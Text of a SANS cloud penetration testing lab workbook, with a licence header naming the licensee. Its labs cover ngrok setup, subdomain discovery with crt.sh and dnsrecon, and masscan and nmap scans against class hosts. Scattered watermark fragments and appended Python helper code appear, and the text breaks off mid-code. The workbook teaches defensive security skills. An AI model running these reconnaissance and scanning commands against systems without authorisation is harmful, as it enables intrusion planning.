SEC588 Workbook


© SANS Institute 2020 SEC588 | CLOUD PENETRATION TESTING

THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org

Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020


Copyright © 2020 Moses Frost. All rights reserved to Moses Frost and/or SANS Institute.

PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT
("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS
COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND
SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS
ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.

With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware
subject to the terms of this agreement. Courseware includes all printed materials, including course books
and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by
SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the
CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this
CLA supersedes any oral or written proposal, agreement or other communication relating to the subject
matter of this CLA.

BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY
ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY
CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS
INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF
POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF.

If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.

User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon
all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any
purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent,
lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written
consent of SANS Institute.

If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be
deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or
addendum to this CLA may accompany this Courseware.

SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs
presented in this Courseware are the sole property of their respective trademark/registered/copyright
owners, including:

AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My
Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac,
iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch,
iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro,
Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight,
There's an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are
registered trademarks of Apple Inc.

PMP and PMBOK are registered marks of PMI.

SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission.

SIFT® is a registered trademark of Harbingers, LLC. Used with permission.

Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.

SEC588_W_F02_02
Welcome to the SANS Security 588 Labs Wiki

Welcome to the SANS SEC588 Lab Wiki

This wiki will serve as your lab guide throughout the class. We will try to keep the labs accessible by allowing
cut and paste, as well as provide color to your labs.

This lab wiki is a work in progress and is frequently revised by the course authors. This is beneficial to all, since
you continue to get updates to lab material as we improve the quality of the exercises, correct typos, and add
new exercises.

The online wiki will always be updated, so before class ends make sure you update the wiki prior to leaving class
so you have the most recent version on your computer. The computer's local wiki will always remain.

Accessing the Digital Edition of the Lab Wiki

To access the digital edition of the lab wiki from the Slingshot Linux VM, open the Firefox browser. The home
page will display this text and allow you to navigate to the course lab exercises.

Installing your Virtual Machine

You should have been provided a download link in your portal with the Day 0 instructions. Please review those
instructions to have the virtual machine installed.

The installation steps, in reduced form, are as follows:

Copy over the three virtual machine files from the USB
From VMware Fusion, Workstation, or Player, choose File | Open
Select the ovf file 'SEC588-20-1.ovf'
Once it is imported you will need to make sure the VM is using NAT mode.
The default username and password is sec588 \ sec588
You should be able to open Firefox to test connectivity by connecting to: http://www.sans.org

Updating the Lab Wiki – Linux

The Virtual Machine should be connected to the Lab Environment.

Once the Section 1 or Day 1 labs are completed, you should be able to update the wiki by performing the
following command:

sec588@slingshot:~$ wiki-updater.sh

That's it! With this one step you will always have the most current lab materials.

Conventions

The following typographical conventions are used throughout the labs:

Italic

Indicates new terms and items of emphasis.

Constant width

Used for terminal output and within paragraphs to refer to tools or other elements such as variables,
function names, statements, keywords, etc.

| (vertical bar)

The vertical bar is used to indicate steps necessary for navigating through menus (Edit | Paste)

Code blocks are used to denote output from tools. Content that is bold represents commands you type.

For example:

# run_this_command
output from the tool

This class uses dynamic URLs, meaning that you will not be able to see the URL for your class subdomain in the
local wiki. We will attempt to 'auto-fill' the URL for the class subdomain through automation in the tools we
provide for you online.

In some cases, the commands you type will call for information that you supply (i.e., information that we don't
know). In these cases, the content that you supply is noted in italics: yourinput. Replace yourinput with the
information you supply as described in the exercise.

This icon signifies a tip, suggestion, warning, or a general note.

Course and Lab Feedback

We are always excited to hear your feedback on the course materials. Is there a bug we need to squash? Do you
have a suggestion for a new awesome tool that we just have to see? Please let us know.

You can also reach out to Moses Frost directly:

Moses Frost – moses@moses.io (mailto:moses@moses.io)

Thank you!!

Update: 2020-007

Getting Started
If you can read this, you are more than likely already on the classroom Slingshot VM. Welcome to SEC588 Cloud
Penetration Testing!

If you are an OnDemand student, you should be getting access to labs for the next 4 months. Check your SANS
account for continued access.

One of the features of this class is an online wiki. You may not have found the online wiki yet; however, it is
recommended that you have the passwords for the wiki when you do get access.

For students in class, the instructors will provide you the passwords for the wiki and for the CTF wiki.

For OnDemand students, you will find this in the MyLabs portal.

A VPN has been provided to ensure that you are not troubleshooting the environment at home. It is
recommended that you use the VPN provided by the SANS team for a smooth lab experience.

Use the VPN configuration found in the My Labs portal for this.

Walkthrough

VMware Required

The class VM, Slingshot, has been thoroughly tested on VMware. While we understand that some students
prefer to use other hypervisors, we do not support them in the class. If they do boot and are able to work, that
is perfectly fine, but understand that any problems you experience in the labs may have to do with an
unsupported hypervisor, so we will be asking you to use a supported hypervisor.

Please ensure you have already downloaded and installed VMware on your system.

If you have not already installed VMware, download and install it now for your platform:

VMware Workstation Evaluation for Windows and Linux Systems (http://bit.ly/SEC588-Lab1-1-VMware)
VMware Fusion Evaluation for OSX (http://bit.ly/SEC588-Lab1-1-Fusion)

You may be eligible for a free trial period of VMware Workstation Player or VMware Fusion.

We do not support the use of other virtualization products such as VirtualBox or Hyper-V in this class. You are
welcome to experiment and try to use these platforms, but we cannot support any problems that may arise.

Copy the VM Files

Find the Day 0 instructions to mount your ISO on your computer. Using Windows Explorer or Finder (macOS),
copy the individual virtual machine files to your desktop or another convenient location. This will take several
minutes to complete.

Launch the Slingshot Linux VM

Launch the Slingshot Linux VM by opening VMware Workstation and using the File | Open menu to open the .ovf
that was decompressed. If VMware indicates that the virtual machine might have been copied or moved, select I
Copied It when prompted.

VMware Dialog Prompt

Log In to the Slingshot Linux VM

After the Slingshot Linux VM finishes booting, log in with the following username and password:

Username: sec588
Password: sec588

That's the last step! You can keep the Slingshot Linux VM running and continue to experiment, or shut it down
until you need it for a lab exercise.

Lab 1.1: Connecting into our class environment

Brief Intro

The classroom labs are all available in the Amazon cloud or in the Azure public cloud. You have been provided
with a copy of the Slingshot virtual machine on your USB drive. While we strive to keep the classroom
requirements to a minimum, this particular class will require that many of the tools you may use outside of class
be pre-configured or pre-set up. Here is a small list of the tools you may wish to use both in the class and outside
of class:

Amazon's AWS CLI toolkit
Microsoft's Azure CLI toolkit
Git
Eyewitness
PACU
Hydra
Docker's CLI toolkit
Kubernetes Kubelet
InGuardians Peirates
Postman

Many of these tools require Python, Ruby, or C dependencies to operate, so we have provided a copy of the virtual
machine with the preconfigured tools. This class is designed to provide you with access to a cloud environment, and
the instructions in this class will more than likely require you to type commands into a CLI environment. Many of
the tools will either be console driven or at times be based on web applications. As such, getting familiar with
our console is essential.

Getting your class studentX

This class will require you to have a 'Random Student Number'. This is noted as StudentX where X is
replaced with a number. For all students, to get your student number:

You can use a command line interface like so: $ curl ifconfig.me/ip

Once you have done this you can then use the following name for your labs: StudentX where the X is replaced
with the last octet of the IP address from above (the number after the final dot). You will put a 1 in front of
that number, for example:

If your IP address is 23.85.17.191,

You would be: Student1191.

What if your IP is below 100? Your Student Number will start with 10.

If your IP address is 23.85.17.91 then your studentX will be: student1091

Make sure you note this number down.
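The rule above is small but has an edge case (a last octet below 100), so here is a short helper, added for this workbook and not part of the course materials, that derives the label from an address string and rejects input that is not an IPv4 address. It assumes the rule generalises to zero-padding the last octet to three digits (so an octet below 10 would give Student1005, which the lab text does not spell out) and that OnDemand students only change the prefix.

```python
import ipaddress


def student_number(ip: str, prefix: str = "Student") -> str:
    """Derive the class student label from a public IPv4 address string.

    Lab rule: take the last octet of the address and put a 1 in front of it.
    For an octet below 100 the label starts with 10 (91 -> 1091). Zero-padding
    the octet to three digits reproduces both worked cases and is assumed here
    to extend to octets below 10 (5 -> 1005); that extension is not stated in
    the lab text.
    """
    addr = ipaddress.ip_address(ip.strip())  # raises ValueError on non-address input
    if addr.version != 4:
        raise ValueError("the student-number rule is defined for IPv4 addresses only")
    last_octet = int(str(addr).rsplit(".", 1)[1])
    return f"{prefix}1{last_octet:03d}"


if __name__ == "__main__":
    # The two worked cases from the lab text plus the assumed sub-10 case.
    for sample in ("23.85.17.191", "23.85.17.91", "23.85.17.5"):
        print(sample, "->", student_number(sample))
```

Feeding the output of `curl ifconfig.me/ip` straight into this function is the intended use; the `ipaddress` parse makes sure a stray HTML error page or an IPv6 answer is caught instead of producing a nonsense label.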

For OnDemand students please note:

OnDemand students will use the following nomenclature: StudentODX

Please note that we will be deleting your assets every week on Sunday night, and there may be labs that need to
be completed within that timeframe.

Requirements for This Lab

To use this lab we recommend visiting the wiki Getting Started page (Getting-Started.html). This will walk you
through the virtual machine extraction process. We will be updating the wiki as we go through the lab.

Try It Yourself

The following are step-by-step instructions to extract the virtual machine and gain familiarity with the tools that
will be used in the class.

Walkthrough

Getting Familiar with the VM

Once the virtual machine is booted and you are logged in as the SEC588 user, let's get familiar with the
different tools that you may see on the virtual machine.

Double-click the MATE Terminal and let's get familiar with the shell layout. Most of this virtual machine's custom
tools will be found in the /opt directory.

Below is a small example of the tools that we will be looking at in this lab and get familiar with throughout the
class.

.-.              <- root of the tree
|
\opt             <--- optional directory
|----az          <- This is the Azure CLI Tools
|----burp        <- This is the directory with the Burpsuite tools
|----eyewitness  <- This is the eyewitness directory
|----masscan     <- This is the Masscan directory
|----postman     <- This is the Postman directory
|----pacu        <- This is the PACU directory

Getting familiar with Cloud SDK CLIs

From the MATE prompt, let's change into the az directory to get familiar with the Azure CLI SDK.

$ az help

The Azure SDK provides you the capability of using their APIs as native CLIs. We will use this functionality later
in the class. Almost any component in the Azure cloud can be instrumented with the Azure CLI SDK; as you can
see above, the capability of the CLI toolkit is vast and will provide us capabilities in the upcoming days.

The next SDK we want to get used to working with is the AWS SDK. Let's ensure that it works by typing the
following:

$ aws help

You should have the help output appear.

Postman

Postman is another tool that we will use in this class, so ensuring that it launches would also be a good idea.
Postman will be introduced tomorrow. Change into the /opt directory and open Postman.

$ cd /opt
$ cd postman
$ ./Postman

If it opens it should show up like the screenshot below. We will be ok to close this screen as it will be used in a
different and new lab.

Setting up the environment with ngrok

Throughout the week we will be discussing ngrok. While we have not introduced it to you yet, we do want to get
ready for this step. In order to do so, let's register with a valid and free ngrok account.

Let us begin by working on getting a valid ngrok key. To do this open Firefox:


Navigate to www.ngrok.com. This will provide you with a page to sign up for a valid ngrok account; click
SIGN UP.

From here sign up for an account:

Once you are logged in, you can now copy the authtoken in step 3.

The next part will be to add the authtoken and test it. To do this you will need to open a terminal.


From here you will need to type the following:

ngrok authtoken <string from the above step>

ngrok http 9999

If this worked correctly you should see a screen somewhat similar to the screenshot below:

The URL is random for every student. Let's see how we can use this as a webserver.

Open another MATE terminal:

$ cd /tmp
$ python -m SimpleHTTPServer 9999

Now go back to the Firefox browser and go to:

http://<random-ngrok-hostname>.ngrok.io

The attack we are going to execute will look like the diagram below, and yes, it is a circular-like attack:

What you should see on the screen is something like so:

Replay of this lab

Conclusion

This lab is the beginning point for us to find and obtain access into our environments. This lab will also ensure
that we have a solid working system that we can use both inside the classroom and potentially outside the
classroom. If needed you can shut down this image and take a snapshot with the image turned off. This will help
you restore to a pristine day 1 image if needed.

Lab 1.2: Lab Discovery

Brief Intro

In Day 1 we will have a mission to provide context on the importance of reconnaissance at scale. This wiki needs to
be updated, and you need to discover both the keys to the wiki as well as the location of our actual labs. We have
decided to make this particular lab a treasure hunt to be able to show you how discovery at scale is meant to
work. This lab will showcase the ability to discover the associated domains that are potentially available to an
environment and then use a custom wordlist to brute force the discovery of our lab targets. In a later lab we will
find additional items that we may be able to use to gain wiki access.

Requirements for This Lab

Please note that SANS understands that some folks will have challenges with their ISP and running scans, for
example this wordlist scan. Even at times when we attempt to hard-set your DNS settings you may find that
scans are not running correctly. As such we are going to attempt to provide workarounds in class. You may find
that you have to run a VPN connection in order to perform scans.

In this lab we will be requiring the SEC588 virtual machine to be extracted. It is also going to require internet
connectivity. You will need to be able to load crt.sh (http://crt.sh). In addition we will be using a wordlist found in
the /home/sec588/files/wordlists directory. You will need to create a file in this directory for hosts.

You will also be using a tool called dnsrecon.py that will be the tool to help you discover and enumerate hosts.

This is the final lab of your on-VM wiki! We need to accomplish and finish the Day 1 labs to get full access to our wiki
from here on out.

Try It Yourself

This lab requires you to use crt.sh (http://crt.sh) to find all the subdomains listed on the crt.sh website.

This lab also will require that you go to sec588.net and use it as the seed value for our lab.

There is a tool called dnsrecon.py that will be able to parse crt.sh for you and provide you with a list of
subdomains. You can find this tool in

$ /opt/dnsrecon

Based on these subdomains you should be able to discover the hosts. To do this, instead of using one of the methods
for creating subdomain lists, let's leverage our own.

Place all of the hosts that are found in the output of dnsrecon.py into a file called
/home/sec588/files/workdir/urls.txt. You can do this with your favorite editor. If you're not familiar with
Linux then run the following command:

$ gedit /home/sec588/files/workdir/urls.txt

Place the entries into this file, save it, and then close gedit.

Hint: You may want to start with the type -t crt.

Walkthrough

Gathering subdomains

Open a MATE shell and let's re-run dnsrecon.py.

We have created a wordlist using Commonspeak2, which we will discuss further in Day 2. For now, let's take a
look at that wordlist. You can use less to read through the file; if you are not familiar with less, you can press
q to exit when you're done.

$ less /home/sec588/files/wordlists/subdomains.txt

We can also see how long this wordlist is:

$ wc -l /home/sec588/files/wordlists/subdomains.txt

This is a fairly lengthy list, as we can see over 70,000 entries. We will discuss the creation of this wordlist on Day
2. If we attempted to work through this particular list our lab would take over 1 hour! We have shortened this list for
you with the following command:

$ head -5000 /home/sec588/files/wordlists/subdomains.txt > /home/sec588/files/wordlists/subdomains-5k.txt

Running DNS Recon

Now that we are armed with a wordlist, let's attempt to figure out which one of our domains we will be
using for class.

Run dnsrecon with the following command line arguments:

$ cd /opt/dnsrecon
$ ./dnsrecon.py --iw -d sec588.net -t crt

Note that you will see [+] 0 Records Found but will have a list of "Subdomains". With these subdomains you can
take EACH one to find the subdomain for you to use with class.

What do the commands do?

--iw ignore wildcards

-d specify a domain, in this case sec588.net

-t specify the type of dnsrecon scan to run; in our case let's check crt.sh

This should output several discovered subdomains. The class set of wordlists will be growing every class run, so
do not be surprised by a very large list.

You may have to brute force the first few subdomains to find the one for class; it may be the newest one but it
could also be a few more down. Just keep this in mind as we work through this particular lab. At the time of
writing it was our latest entry, but in your class it will be different.

Figuring out which domain is truly yours

How do you tell you have the right domain? We have hidden the class identifier in a TXT record. For example,
OnDemand students can perform the following commands to see if they have the right domain:

$ nslookup
> set type=TXT
> <class-subdomain>.sec588.net

Alternatively, we included an 'Automated Way' to check to make sure that you have found the appropriate
subdomain:

Step 1: Run the command and output the results to a text file:

$ ./dnsrecon.py --iw -d sec588.net -t crt > ~/files/workdir/dnsrecon-output.txt

Step 2: Run a command to trim down the 'dnsrecon-output.txt' file to only have the sub-domains and output to a
new file, 'cutlist.txt':

$ cat ~/files/workdir/dnsrecon-output.txt | cut -c9- | cut -f1 -d ' ' | grep sec588 > ~/files/workdir/cutlist.txt

Step 3: Run this bash shell one-liner to use 'dig' to look for the special TXT record to find valid domains:

$ for i in $(cat ~/files/workdir/cutlist.txt); do echo "[+] Querying $i"; dig -t txt +short $i; done

If the answer is:

<class-subdomain>.sec588.net text = "ondemand"

You have located the correct subdomain!

If you wish to save this as an environment variable, this may help you with labs:

$ export CLASS_SUBDOMAIN=<class-subdomain>

Save this in bash for reboots:

$ echo 'export CLASS_SUBDOMAIN=<class-subdomain>' >> /home/sec588/.bashrc

An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab12-subdomain-output.txt)
or the local wiki (http://localhost/wiki/files/lab12-dnsrecon-output.txt)
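To show what the three-step 'Automated Way' does in one place (the cut/grep extraction in Step 2 and the TXT-marker check in Step 3), here is an added Python example; it is not part of the course materials or of dnsrecon. It assumes dnsrecon prints one record per line as "[+] <type> <name> <address>" (the constructed sample below follows that shape, with a made-up "classxyz" label and 203.0.113.x addresses), keys on that layout instead of the fixed `cut -c9-` column so record types of any width are handled, and substitutes a constructed answer table for `dig` so it runs offline; `dig_txt` is the live equivalent.

```python
import re
import subprocess

# Constructed sample in the shape the cut/grep pipeline above assumes:
# "[+]", whitespace, record type, owner name, then the address or target.
# The hostnames, the "classxyz" label and the 203.0.113.x addresses are made up.
SAMPLE_DNSRECON_OUTPUT = """\
[*] Performing Crt.sh Search Enumeration against sec588.net
[+] \t A www.sec588.net 203.0.113.10
[+] \t CNAME blog.sec588.net cdn.example.net
[+] \t A classxyz.sec588.net 203.0.113.20
[+] \t A wiki.classxyz.sec588.net 203.0.113.21
[+] \t A old999.sec588.net 203.0.113.22
[+] 0 Records Found
"""

# One record line: prefix, record type, owner name, address/target.
RECORD_LINE = re.compile(r"^\[\+\]\s+(?P<rtype>[A-Z]+)\s+(?P<name>\S+)\s+(?P<target>\S+)")


def extract_hostnames(output: str, apex: str = "sec588.net") -> list[str]:
    """Equivalent of the `cut | cut | grep sec588` step, but keyed on the record
    layout rather than a fixed column offset, so A, AAAA, CNAME and TXT lines are
    all handled. Keeps only names in our zone, in order, without duplicates."""
    apex = apex.lower()
    names = []
    for line in output.splitlines():
        m = RECORD_LINE.match(line)
        if not m:
            continue  # banner, "0 Records Found" and other status lines
        name = m.group("name").lower().rstrip(".")
        if name != apex and not name.endswith("." + apex):
            continue  # crt.sh can return unrelated names; drop them here
        if name not in names:
            names.append(name)
    return names


def dig_txt(name: str) -> list[str]:
    """Live lookup: the same `dig -t txt +short` call as the one-liner above.
    Needs network access; the quotes dig prints around TXT strings are stripped."""
    proc = subprocess.run(["dig", "-t", "txt", "+short", name],
                          capture_output=True, text=True, timeout=10)
    return [v.strip().strip('"') for v in proc.stdout.splitlines() if v.strip()]


def find_class_subdomains(names, marker: str = "ondemand", lookup=dig_txt) -> list[str]:
    """Return every candidate whose TXT record carries the class marker.
    `lookup` is injectable so the logic can be exercised without DNS."""
    hits = []
    for name in names:
        try:
            values = lookup(name)
        except (OSError, subprocess.SubprocessError):
            continue  # dig not installed or timed out: treat as no answer
        if marker in values:
            hits.append(name)
    return hits


# Offline stand-in for dig: a constructed answer table. Only the "ondemand"
# marker comes from the lab text; every other value is made up.
FAKE_TXT = {
    "sec588.net": ["v=spf1 -all"],
    "classxyz.sec588.net": ["ondemand"],
    "old999.sec588.net": ["retired"],
}


def fake_lookup(name: str) -> list[str]:
    return FAKE_TXT.get(name, [])


if __name__ == "__main__":
    candidates = extract_hostnames(SAMPLE_DNSRECON_OUTPUT)
    print("candidates:", candidates)
    print("class subdomain(s):", find_class_subdomains(candidates, lookup=fake_lookup))
```

Against real output, pass the contents of ~/files/workdir/dnsrecon-output.txt to `extract_hostnames` and leave `lookup` at its default so `dig` is used; the regex approach is the reason to prefer this over `cut -c9-`, which silently drops any line whose record-type column is wider than one character.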


We will now run the following command to be able to dive into that subdomain and scrape out the individual
hosts. If these commands do not work, look for the output file example below.

$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D /home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c /home/sec588/files/workdir/dnsrecon.csv

What do our new commands do?

-D use a wordlist, in the above example /home/sec588/files/wordlists/subdomains-5k.txt, which was
created for you

-t brt,crt use the following modes of operation: brt instructs the tool to brute force the wordlist, and crt
also runs the crt.sh scan

-c output to csv to save results and view/use them later

--threads increase the number of threads from 1 to, in our example, 10

We now see that we have found the following URLs; remember YOUR subdomains will be different, as they are in
every class:

www.<class-subdomain>.sec588.net
wiki.<class-subdomain>.sec588.net
blog.<class-subdomain>.sec588.net
dev.<class-subdomain>.sec588.net

An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab12-dnsrecon-output.txt)
or the local wiki (http://localhost/wiki/files/lab12-dnsrecon-output.txt)

Please make a note of these hostnames; we will be referring to these hosts throughout the class. You can use any
notepad application you are comfortable with. If you are not sure which one, you can use either gedit or
nano.

$ nano /home/sec588/files/workdir/urls.txt

Replay of this lab

Conclusion

In this lab we have discovered how to enumerate hosts with dnsrecon.py. We could also use alternative tools like
gobuster, but we will be using this tool in another lab.

The next few labs will be available in print and on our online wiki!

Use the following URL for the next few labs:

http://wiki.<class-subdomain>.sec588.net

For the next lab we will be using the online wiki so that we can fix our class wiki.

Why This Lab Is Important

Often as attackers we may want to discover subdomains and hosts within those domains, but we may run
into several issues. These could include false positives, shunning, or other false negatives. We need to
understand how we can use tools, weed out the false positives, and attempt to determine if there is an
opportunity for an attacker to uncover our sites.

>
om
Bonus (If Time Permits or Homework)

_c
ok
As an additional lab if you wish to nd out about how subdomain enumeration works you may try and use the
following gobuster commands: 23169600 @
ou
tlo
66

$ /opt/gobuster/gobuster dns -d <class-subdomain>.sec588.net -w


s1

/home/sec588/files/wordlists/subdomains-5k.txt
ne
ljo

This is an additional resource will use in another lab for other types of enumeration.

Gregg Harris
au
<p

Additional Resources
s
rri
Ha

Check out SANS SEC542 for additional resources on how to do web enumeration (https://www.sans.org/course/web-
.
gg

app-penetration-testing-ethical-hacking)
re

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li

live

Lab 1.3: Portscans at Scale

Brief Intro

Portscans at scale can be very critical for discovery of new servers, and more importantly services, that may be littered across many cloud environments across the internet. This lab will attempt to uncover what exposed ports, and by relation what default configurations, we can find in our cloud environment. This lab will show us the strengths and the limitations of each of our tools. We will also display the methodology that we can employ in each one of the tools to gather more and more information from our cloud environments.

Recall that we are using the information from our previous lab to generate the target list for this lab. Example:

dnsrecon -> provides hostnames with IPs -> feeding into -> masscan and then -> nmap.

Requirements for This Lab

In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet connectivity.

This lab will be hosted and found on:

http://wiki.<class-subdomain>.sec588.net

Try It Yourself

To attempt this lab without hints, the following methodology should be followed:

1. Look at the results from our dnsrecon.py script and locate all the A records that have just an IP address.
2. Place these IPs in a file to be referenced later, such as:

/home/sec588/files/workdir/ips.txt

3. Run the masscan command with --top-ports.
4. Run the masscan command with a list of ports such that the following ports are included: 20-25,79-80,8000-9000,6739,1433,1434,5432,3306,27017
5. Follow this up by running nmap against the found ports with a script scan.
6. Attempt to run the script scan with additional tools that match the ports that were found.
7. Save the results in an output directory to be looked at with a visual editor.

Walkthrough

Gathering hosts to scan

While nmap does a fairly good job of helping automate and locate hosts on a large network, masscan acts a little differently. It does not do DNS resolution, as an example. Due to the targeting that we must have in our lab, we will be providing masscan a very simple set of hosts to scan. To do this, we will look back at our previous lab. Let's gather some hosts to scan.

Open a MATE shell and let's re-run dnsrecon.py.

Remember that our subdomain will be different each class.

$ cd /opt/dnsrecon

ONLY DO THIS IF YOU HAVE NOT COMPLETED LAB 1.2

$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D /home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c /home/sec588/files/workdir/dnsrecon.csv

Now let's create a list of IP addresses based on these CSV entries. We will provide you with two options to do this; either one will work, this is based on preference.

Option 1: Use gedit and manually enter the IP addresses into a text file:

$ gedit /home/sec588/files/workdir/ips.txt

We will reference this file in both nmap and masscan using the -iL keyword.

Option 2: Use the following awk statement to create the file:

$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print $3 }' | grep -v Address | grep -v '^$' | sort -u > /home/sec588/files/workdir/ips.txt

What we have done here is taken our list of known IP addresses that we found through DNS reconnaissance and started to scan them. Some of these will be generic AWS services that will yield no value; if you can identify those, you may be able to discard them.

Masscan

We will start our wide-scale scan with Masscan. We will do this as it is designed to identify live hosts and their listening ports quickly. Masscan does have some limitations to how it operates. It is designed to:

Scan the internet at scale
Scan a small set of ports but a large number of addresses.

We will be using some of these features specifically to find what ports are open across our clouds. Let's start by scanning our IP addresses and seeing what default ports masscan finds:

$ cd /opt/masscan

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-masscan-ips1.txt) or the local wiki (http://localhost/wiki/files/lab13-masscan-ips1.txt)

$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-1024

This should scan the first 1024 ports on a host. Let's take a look at what we discover.

Just to review what this does:

-iL This specifies a file as input
-p This specifies a list of ports.

Masscan in this example will discover a few ports on this host. This particular host has port 80 and 22 open. This scan is almost the same as our --top-ports feature in masscan, as --top-ports is only ports 1-1000. Let's expand this to include 5,000 ports. The command below is 4 zeros.

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-masscan-ips2.txt) or the local wiki (http://localhost/wiki/files/lab13-masscan-ips2.txt)

If the command below takes a long time, such as 5 minutes, CTRL-C to abort.

$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-5000

Once it is complete you will find a new port, 6379. Let's try and expand our search further by creating a list of ports that includes well-defined database ports:

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-masscan-ips3.txt) or the local wiki (http://localhost/wiki/files/lab13-masscan-ips3.txt)

$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p20-80,443,445,1433,3306,6379,5432,27017

We now see several ports open that are interesting. Let's follow this up with a very thorough and narrow nmap scan including specific NSE scripts:

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-nmap-scan1.txt) or the local wiki (http://localhost/wiki/files/lab13-nmap-scan1.txt)

$ sudo nmap -iL /home/sec588/files/workdir/ips.txt -p 80,22,6379,27017 -A -oA /home/sec588/files/workdir/scan1

To review what this does:

-iL This is the file to use
-A This enables script scan, traceroute, OS fingerprinting, and version scanning.
-p This scans a specific set of ports that we discovered with masscan.
-oA This enables saving the output with the filename of scan1 and will include nmap format, grep format, and XML format.

What you will notice is that this command will fill up the entire terminal window.


This scan scrolls off the screen, so let's open our scan1.nmap file in gedit.

$ gedit /home/sec588/files/workdir/scan1.nmap

This shows us a few things.

1. A Redis database is found, but none of the script scans fired for it.
2. A MongoDB database was found, and there are databases that are enumerable in the scan results.

While this scan is valuable in its default state, it does not check the Redis database that you may have noticed was found in this environment. Let's enable some Redis and MongoDB checks.

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-nmap-scan1.txt) or the local wiki (http://localhost/wiki/files/lab13-nmap-scan1.txt)

$ sudo nmap -iL /home/sec588/files/workdir/ips.txt -p 80,22,6379,27017 -oA /home/sec588/files/workdir/scan2 -O -sV --traceroute --script=redis*,mongo*

The command above changes the script function so that we can modify the script scans but keep the other options enabled.

What are our new command options?

--script=redis*,mongo* Script scan for any NSE script files that begin with mongo or redis
-O OS fingerprint scan
-sV Version scan
--traceroute Enable traceroute on the scan

We now have additional output.

$ gedit /home/sec588/files/workdir/scan2.nmap


We now see that we have both an enumerable MongoDB and an enumerable Redis scan.

Replay of this lab

Why This Lab Is Important

This lab displays the use of nmap and masscan in conjunction, but more importantly, it shows how you can create a scanning pipeline. A pipeline that can provide us

Conclusion

In this lab we explored using masscan and using nmap. While we didn't do an internet-wide scan, import a large subnet block, or make use of all of masscan's features, we did provide a workflow that is actionable in a real-world scenario. Masscan can be used in conjunction with nmap to provide a consistent, accurate workflow that will allow us to discover hosts.

We now have the following view of our environment.

1. We have several domains that we enumerated
2. We discovered some known and unknown host entries
3. We have discovered the ports that some of the hosts are using
4. We will now go further into discovering additional flaws.
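The masscan-to-nmap hand-off in this lab was done by reading the masscan output and typing the port list into nmap by hand. The following Python example, added here and not part of the course materials or of either tool, shows what the glue step of such a pipeline looks like when it is scripted: it parses masscan's on-screen "Discovered open port" lines (the sample output and the 203.0.113.x addresses are constructed, not lab hosts), collapses duplicates, and then groups hosts by their open-port set so that each nmap run probes only ports masscan actually saw open on those hosts, rather than the union of every port on every host. The nmap options (-A, -oA) are the ones the lab uses; the output prefix is an assumed path.

```python
import re
from collections import defaultdict

# Constructed sample of masscan's on-screen output (not a real scan). The banner
# lines are included to show that only "Discovered" lines are parsed, and port
# 80 on .10 is reported twice on purpose to show duplicates collapsing.
SAMPLE_MASSCAN_OUTPUT = """\
Starting masscan 1.0.5 at 2020-07-28 12:00:00 GMT
Initiating SYN Stealth Scan
Scanning 2 hosts [8 ports/host]
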